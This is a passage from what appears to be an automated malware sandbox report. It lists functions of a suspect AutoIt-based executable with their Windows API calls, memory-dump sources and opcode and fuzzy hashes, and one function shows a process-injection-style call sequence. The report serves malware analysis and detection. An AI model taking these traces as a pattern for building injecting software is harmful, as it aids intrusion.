                    • Opcode ID: bc29a9486419719ca63077715cc0f48772d0f8b1a36a9c0023732f1521483a65
                    • Instruction ID: 6c5ccc8735a7216ab8ac895f8f0751dafe711991a9eeb3556d3479dff73ca81b
                    • Opcode Fuzzy Hash: bc29a9486419719ca63077715cc0f48772d0f8b1a36a9c0023732f1521483a65
                    • Instruction Fuzzy Hash: F7F08955E04FD0EBDE7FD37BFDCEB712A506F1272DF0C4145A2455A0B286965C16C502
                    Function 00C2ECED Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNEL32(?,00000000), ref: 00C2F4AB
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C2F541
                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C2F563
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction ID: d7cb7e8f9ffbe6e2981b3b265ae7e4540abe0c2656467c5c819c7d982faa8fff
                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction Fuzzy Hash: 1E12CD24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                    Function 00AE5F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 86197de6b93524e9aea76b601f03e4973b681045060dfe3bf1b6a9407a274384
                    • Instruction ID: ef9c8e57f5c43f6004cebfb2586242c8bee8f2060bd466ac80db703b7598509d
                    • Opcode Fuzzy Hash: 86197de6b93524e9aea76b601f03e4973b681045060dfe3bf1b6a9407a274384
                    • Instruction Fuzzy Hash: 2171C331C0CBD05EC73A873BA814675BBB06B763ACF4D8A9AD0958B1E3D6718D449392
                    Function 00411FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9a4eac9cae6ae412a9e9d844f6cabf31f1ec9c88f92de94d838ac32c95e10256
                    • Instruction ID: 6b63161941b3488df7078e909ce163a2a1fa0d71039c57995929c397e8c210d0
                    • Opcode Fuzzy Hash: 9a4eac9cae6ae412a9e9d844f6cabf31f1ec9c88f92de94d838ac32c95e10256
                    • Instruction Fuzzy Hash: 4C51D234700604AFDF14EF65C981EAE77A6AF45318F15816EF906AB382DA38ED01CB49
                    Function 0040750F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 1c7307e7605e178a4f46017bc53961ffd2370cd713617fee4c5c10c45acb9c04
                    • Instruction ID: 703fb4e51e7414ef2a0eeb7bc43b43b7e3b383bd1c29d48b3ed1298fc8db5a6e
                    • Opcode Fuzzy Hash: 1c7307e7605e178a4f46017bc53961ffd2370cd713617fee4c5c10c45acb9c04
                    • Instruction Fuzzy Hash: FD319279A08612AFC714DF19D490A62F7E0FF09310B54C57EE98A9B791D734E841CB8A
                    Function 00AE6490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e64beda50162301ea35b91e6c0367e5acc081ec0b5a9796b4419f91fb16ebd91
                    • Instruction ID: ba0183b72a38e380850a532ede5ae113a0cd8e0fc52491e9de17607f2509cde7
                    • Opcode Fuzzy Hash: e64beda50162301ea35b91e6c0367e5acc081ec0b5a9796b4419f91fb16ebd91
                    • Instruction Fuzzy Hash: 2A31F071D0C3D18ACB36CB2BC548379BBB06BB27E4F4C8E9AD1858B1E2D6758C049752
                    Function 00405AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00405B96
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                    • Instruction ID: 1b656b166a304b9d337e3dd4d9fe6df5e0790be29ec59920d2bb6ad29cb972c8
                    • Opcode Fuzzy Hash: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                    • Instruction Fuzzy Hash: F0315C31A00A09AFDB18DF6DC480A6EB7B5FF48310F14866AD815A3754D774B990CF95
                    Function 00420C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                    Function 0043FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                    • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                    • Opcode Fuzzy Hash: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                    • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                    Function 004059B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 96c929bf77b3b37bef83dc6561b6447fdcd5197876a84e0889d6f1de037c7794
                    • Instruction ID: 5aee7fa9bcd607eba38c972a5a3afb297840d704fa760c95cbb8f93a96c2956d
                    • Opcode Fuzzy Hash: 96c929bf77b3b37bef83dc6561b6447fdcd5197876a84e0889d6f1de037c7794
                    • Instruction Fuzzy Hash: 2821D471910A08EBCB009F52F84076A7BB8FB09310F21957BE485D5151DB7494D0D74E
                    Function 00404DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                      • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                      • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                      • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                    • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                    • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                    • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                    Function 00407F77 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 47647f3d04b386c0c2150db9e578cdfe8af40bf34edb4e6fd3868b4b8a472812
                    • Instruction ID: 95ef85ecf4a985c53e38b6b1237abcb75d3ed32973377874be14757091495c4e
                    • Opcode Fuzzy Hash: 47647f3d04b386c0c2150db9e578cdfe8af40bf34edb4e6fd3868b4b8a472812
                    • Instruction Fuzzy Hash: 2B112C756046029FC724DF29D541916B7E9EF49314B20882EE48ACB362DB36E841CB55
                    Function 0043FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                    • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                    • Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                    • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                    Function 00405BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                    Download Yara Rule
                    APIs
                    • ReadFile.KERNEL32(?,?,00010000,?,00000000,00000000,?,00010000,?,004056A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00405C16
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                    • Instruction ID: 772d3f2de97e4a3295a634e8ff1b07ab9ba467494f4d4c1bb2e9b048b5294e56
                    • Opcode Fuzzy Hash: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                    • Instruction Fuzzy Hash: C5112831204B049FE3208F19C880B67B7F8EB44764F10C92EE9AA96A91D774F845CF64
                    Function 00405A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: a7b9d5836668f83c2a3f51eb8053bbd8b90c3f0a49dd782c3ce1182c41f61193
                    • Instruction ID: b26529ee9b914c12feaffd8856b12b4ff76ce3a38eeed91d3c5b717ccaf7fb48
                    • Opcode Fuzzy Hash: a7b9d5836668f83c2a3f51eb8053bbd8b90c3f0a49dd782c3ce1182c41f61193
                    • Instruction Fuzzy Hash: 7E01DFB9300902AFC301EB29D441D26F7A9FF8A314714812EE818C7702DB38EC21CBE4
                    Function 00407DE1 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 9c32f161398eb4bd7e122dfe5082f696bb269761549320fc01a7a53078dc7b67
                    • Instruction ID: 8ac4692a4edd8b950221785d74b091900f33ceedfbe0b692f8040025a9c6a4da
                    • Opcode Fuzzy Hash: 9c32f161398eb4bd7e122dfe5082f696bb269761549320fc01a7a53078dc7b67
                    • Instruction Fuzzy Hash: E90126B26013016EC3209F29D806FA7BBD4AB04360F10853FF61ACA1D1EA79F84087D8
                    Function 00AE6086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: ad76dab04f2f54abdb2e3571ea1dc09999a209a42157367896a55cadce46be18
                    • Instruction ID: 0418ca6a570d9a8215c129544c9ff2dc03d6f413d78be1ca0089e14832ea6f7a
                    • Opcode Fuzzy Hash: ad76dab04f2f54abdb2e3571ea1dc09999a209a42157367896a55cadce46be18
                    • Instruction Fuzzy Hash: 12018071C0D3D09FC7268B3794142767BB46B777A4F098E9AA0859B1A2D6709C04D752
                    Function 00424863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    • __lock_file.LIBCMT ref: 004248A6
                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                    • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                    • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                    • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                    Function 00404E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                    • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                    • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                    • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                    Function 00420791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
